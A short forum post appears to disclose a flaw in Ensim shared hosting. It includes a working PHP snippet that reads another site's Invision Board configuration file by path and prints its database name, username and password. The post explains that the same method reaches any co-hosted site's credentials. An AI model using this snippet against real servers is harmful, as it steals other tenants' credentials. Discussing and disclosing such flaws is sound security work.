Server-wide File Access on a Shared Ensim Server
<?PHP
include "/home/virtual/foobar.com/var/www/html/invisionboard/conf_global.php";
echo "Database: " . $INFO['sql_database'];
echo "<br>Username: " . $INFO['sql_user'];
echo "<br>Password: " . $INFO['sql_pass'];
?>
Placing the script above under any domain on a given server and altering the domain name in the path, I can fetch the default configuration files and echo sensitive information on my screen. The scenario above would give me the invisionboard database username and password for whoever hosts invisionboard on the same server with myself. The principle obviously applies for any and all scripts which are publicly available, since figuring out the paths to "interesting" files is easy.
Any thoughts?
